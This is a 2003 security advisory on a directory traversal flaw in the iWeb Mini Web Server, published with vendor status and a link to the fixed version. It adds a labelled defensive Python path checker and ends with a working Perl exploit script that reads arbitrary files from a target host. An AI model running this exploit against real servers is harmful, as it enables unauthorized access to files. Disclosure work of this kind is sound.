SFAD03-001: iWeb Mini Web Server Remote Directory Traversal

2003-04-16T00:00:00
ID SECURITYVULNS:DOC:4396
Type securityvulns
Reporter Securityvulns
Modified 2003-04-16T00:00:00

Description

[=================================================================]

[=================================================================]

Title         : iWeb Mini Web Server Remote Directory Traversal
Risk          : Moderate - Low
Software      : iWeb Mini Web Server
Platforms     : Windows NT/XP/9x
Vendor URL    : http://www.ashleybrown.co.uk/iweb/
Discovered by : subversive <subversive@linuxmail.org>
Advisory ID   : SFAD03-001

.....:[ Overview :

The iWeb Mini Web Server is a mini web server designed for use on Intranets and for testing websites in a realistic environment.

.....:[ Details :

iWeb does not correctly filter ../ sequences in GET request paths, thereby allowing a remote client to escape the web root and traverse the directory structure of the host.
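As an added defensive illustration (this is not code from the advisory, the vendor, or Security Freaks): a Python path resolver that canonicalises a request path before checking that it still lies inside the web root, plus a small scan that runs the same check over access-log lines to flag requests that would have escaped. The WEBROOT directory, the log lines and the client addresses are constructed for the example; the regular expression assumes Common Log Format request lines.

```python
import os
import posixpath
import re
from typing import List, Optional
from urllib.parse import unquote

# Hypothetical web root for the demonstration (not a path from the advisory).
# It need not exist: the containment check compares canonicalised paths only.
WEBROOT = os.path.join(os.getcwd(), "webroot")

# Pulls the request-target out of a Common Log Format request line.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')


def resolve_in_webroot(webroot: str, request_target: str) -> Optional[str]:
    """Map an HTTP request-target onto the filesystem.

    Returns the canonical file path if it stays inside webroot, else None.
    The order of operations is the point: drop the query string, percent-decode,
    unify separators ('\\' is also a separator on the Windows platforms the
    advisory lists), collapse '.' and '..' segments, and only then compare real
    paths. Testing the raw request string for '../' skips most of these steps.
    """
    path = request_target.split("?", 1)[0]
    path = unquote(path).replace("\\", "/")
    # Normalise relative to the root so that leading '..' segments are kept and
    # then rejected by the containment check, rather than silently discarded as
    # posixpath.normpath('/..') would do.
    rel = posixpath.normpath(path.lstrip("/"))
    if rel == ".":
        rel = ""
    root = os.path.realpath(webroot)
    candidate = os.path.realpath(os.path.join(root, rel))
    try:
        inside = os.path.commonpath([root, candidate]) == root
    except ValueError:
        # Raised on Windows when the paths are on different drives: not inside.
        inside = False
    return candidate if inside else None


def scan_access_log(lines: List[str], webroot: str = WEBROOT) -> List[str]:
    """Return the request-targets in the given log lines that would escape webroot.

    Useful for triage: the same resolver that should gate file serving also tells
    you which historical requests would have been served from outside the root.
    """
    flagged = []
    for line in lines:
        match = REQUEST_LINE.search(line)
        if match and resolve_in_webroot(webroot, match.group("target")) is None:
            flagged.append(match.group("target"))
    return flagged


# Constructed sample log lines (192.0.2.0/24 is the documentation range); the
# second request uses the same ../ prefix as the advisory's proof-of-concept.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Apr/2003:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 512',
    '192.0.2.10 - - [15/Apr/2003:10:00:05 +0000] "GET /../../../../../../../../../outside.txt HTTP/1.0" 200 1024',
    '192.0.2.11 - - [15/Apr/2003:10:00:09 +0000] "GET /docs/../index.html HTTP/1.0" 200 512',
    '192.0.2.12 - - [15/Apr/2003:10:00:12 +0000] "GET /search?q=../x HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for target in scan_access_log(SAMPLE_LOG):
        print("escapes web root:", target)
```

Note that "/docs/../index.html" is accepted: a ".." that stays within the root is legitimate, which is why the decision is made on the canonicalised result rather than on the presence of the substring. The "../x" inside a query string is likewise not a path escape and is not flagged.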

.....:[ Vendor Status :

14/04/03 Initial Contact Made
15/04/03 Vendor Responded
15/04/03 Vendor Released Updated Version

.....:[ Solution :

Remove the old iWeb application, then download and install the updated version, which can be found at:

http://ashleybrown.co.uk/downloads/iws2.exe

.....:[ Exploit - SF-iwsuk.pl :

#!/usr/bin/perl -w
#
# S e c u r i t y F r e a k s
# www.securityfreaks.com
#
# iWeb Mini Web Server Remote Directory Traversal
#
# subversive[at]linuxmail.org - 15/04/2003

use IO::Socket;

my ($host, $port);

# Print usage and quit when no host is given.
if (!$ARGV[0]) {
    print <<"IWEBSUK";

S e c u r i t y F r e a k s
www.securityfreaks.com

SF-iwsuk.pl - iWeb Mini Web Server Remote Directory Traversal

Usage: $0 <host> <file> <port>

IWEBSUK
    exit;
}
else {
    $host = $ARGV[0];
}

# Default to port 80 unless a port was supplied.
if (!$ARGV[2]) {
    $port = "80";
}
else {
    $port = $ARGV[2];
}

my $sock = new IO::Socket::INET(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => $port,
);
die "\nConnection to $host:$port failed\n" unless $sock;

# Request the named file through a ../ sequence that steps above the web root,
# then echo whatever the server returns.
print $sock "GET /../../../../../../../../../$ARGV[1] HTTP/1.0\n\n";
while (<$sock>) { print }
close($sock);
print("\n\n");
exit;
